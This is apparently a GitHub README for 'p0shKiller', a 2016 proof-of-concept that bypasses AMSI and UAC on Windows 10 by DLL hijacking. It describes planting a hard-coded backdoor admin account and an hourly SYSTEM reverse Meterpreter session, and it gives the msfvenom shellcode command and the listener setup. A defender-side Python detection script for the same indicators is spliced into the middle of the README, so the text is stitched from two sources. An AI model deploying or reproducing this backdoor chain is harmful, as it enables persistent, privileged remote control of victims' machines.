GitHub repository (branch master; latest commit c9da839, May 27, 2016). Languages: C++, Python, C.
Repository contents: Amsi, MPAmsiRun, Powershell, UacBypass, ntwdblib, .gitattributes, .gitignore, LICENSE, README.txt, XORMeter.py, p0shKiller.sln (first commit May 26, 2016).

README.txt

       _______         .__     ____  __.__.__  .__                
______ \   _  \   _____|  |__ |    |/ _|__|  | |  |   ___________ 
\____ \/  /_\  \ /  ___/  |  \|      < |  |  | |  | _/ __ \_  __ \
|  |_> >  \_/   \\___ \|   Y  \    |  \|  |  |_|  |_\  ___/|  | \/
|   __/ \_____  /____  >___|  /____|__ \__|____/____/\___  >__|   
|__|          \/     \/     \/        \/                 \/       
						By Cn33liz - 2016

Windows 10 PowerShell5 - Amsi/UAC Bypass/Backdoor/Exploit using DLL Hijacking

Proof of Concept exploit to bypass Microsoft's latest AntiMalware Scan Interface (AMSI) technology within PowerShell 5 on Windows 10.
With this exploit/patch applied, you can take control of PowerShell's program flow by using DLL hijacking and UAC bypass techniques. Every time PowerShell is started, a local admin named BadAss with password FacePalm01 is added to the system (when run by a non-elevated administrator account),
and a reverse (SYSTEM) HTTPS Meterpreter session (default 192.168.1.120) is started every hour using a scheduled task.

Current status: 

* Reported to MSRC on 28-03-2016
* From Microsoft's perspective, AMSI/antivirus isn't a traditional security boundary.

Requirements:

* A Windows 10 box with the latest security patches applied.
* Default UAC settings.
* Local administrator privileges to apply the patch (no elevation needed, because the exploit uses a UAC bypass to patch AMSI/PowerShell).
* A remote HTTPS reverse Meterpreter listener.
* A p0sh fanboy who uses PowerShell on his system ;)

This exploit contains five components (and one Python script):

p0shKiller.exe	- The main tool to apply the patch (only needed once).
UacBypass.dll	- Injected into the explorer.exe process;
		  uses IFileOperation (COM interface) to copy the needed DLLs (only needed once).
Amsi.dll	- This fake DLL is copied into C:\Windows\System32\WindowsPowerShell\v1.0
		  and is the main vulnerable component.
ntwdblib.dll	- Fake ntwdblib.dll copied into C:\Windows\System32,
		  which is loaded by cliconfg.exe (an auto-elevated process) to bypass UAC.
MPAmsiRun.exe	- XOR'ed Meterpreter shellcode payload that is copied into C:\Windows\System32 and called by Amsi.dll.

XORMeter.py	- Python script to generate your own Meterpreter payload (MPAmsiRun.exe), by @vvalien1
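As an added, defender-side illustration (not code from the p0shKiller project), the following Python script checks a host inventory for the indicators the component list above describes: a DLL in the PowerShell application directory that shadows a System32 DLL of the same name (the search-order hijack behind the fake Amsi.dll, generalized here to any DLL name), the dropped files named above, and the added local administrator. The file inventory and Administrators group membership are constructed sample data; on a real machine you would feed it a directory listing and the local Administrators group members.

```python
from pathlib import PureWindowsPath

# Hypothetical detection helper, not part of p0shKiller. It flags the file-system
# and account indicators from the README plus the generic DLL search-order
# hijack pattern (a DLL in an application directory shadowing a System32 DLL).

SYSTEM32 = PureWindowsPath(r"C:\Windows\System32")
POWERSHELL_DIR = SYSTEM32 / "WindowsPowerShell" / "v1.0"

# Drop locations named in the README (fake DLLs and the shellcode runner).
KNOWN_DROPS = {
    str(POWERSHELL_DIR / "Amsi.dll").lower(),
    str(SYSTEM32 / "ntwdblib.dll").lower(),
    str(SYSTEM32 / "MPAmsiRun.exe").lower(),
}


def shadowed_dlls(file_paths):
    """Return DLL names present both in System32 and in the PowerShell
    application directory. The application directory is searched before
    System32, so such a duplicate is the search-order hijack signature."""
    by_dir = {}
    for raw in file_paths:
        path = PureWindowsPath(raw)
        if path.suffix.lower() != ".dll":
            continue
        by_dir.setdefault(str(path.parent).lower(), set()).add(path.name.lower())
    in_system32 = by_dir.get(str(SYSTEM32).lower(), set())
    in_powershell = by_dir.get(str(POWERSHELL_DIR).lower(), set())
    return sorted(in_system32 & in_powershell)


def known_drops(file_paths):
    """Return the inventory entries that match the README's drop locations."""
    return sorted(p for p in file_paths if str(PureWindowsPath(p)).lower() in KNOWN_DROPS)


def unexpected_admins(admin_members, expected=("Administrator",)):
    """Return local Administrators members that are not on the expected list
    (the README's backdoor account BadAss would show up here)."""
    allowed = {e.lower() for e in expected}
    return sorted(m for m in admin_members if m.lower() not in allowed)


def scan(file_paths, admin_members):
    """Run all three checks and return the findings as a dict of lists."""
    return {
        "shadowed_dlls": shadowed_dlls(file_paths),
        "known_drops": known_drops(file_paths),
        "unexpected_admins": unexpected_admins(admin_members),
    }


# Constructed sample inventory of a patched box (not taken from a real host).
SAMPLE_FILES = [
    r"C:\Windows\System32\amsi.dll",
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\Amsi.dll",
    r"C:\Windows\System32\ntwdblib.dll",
    r"C:\Windows\System32\MPAmsiRun.exe",
]
SAMPLE_ADMINS = ["Administrator", "BadAss"]

if __name__ == "__main__":
    for check, hits in scan(SAMPLE_FILES, SAMPLE_ADMINS).items():
        print(f"{check}: {hits}")
```

The shadowing check is the one worth keeping beyond this specific PoC: the legitimate amsi.dll lives in System32, so any amsi.dll (or other System32 DLL name) appearing next to powershell.exe is a hijack regardless of what the planted DLL does. ntwdblib.dll is not shipped with Windows at all, so its mere presence in System32 is already suspicious.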

The following msfvenom command generates the shellcode that is used as the payload and compiled into the code:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f hex > Shellcode.txt

Set up your remote msf listener:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set AutoRunScript post/windows/manage/priv_migrate
exploit -j

* Parts of this code have been borrowed from: https://github.com/hjc4869/UacBypass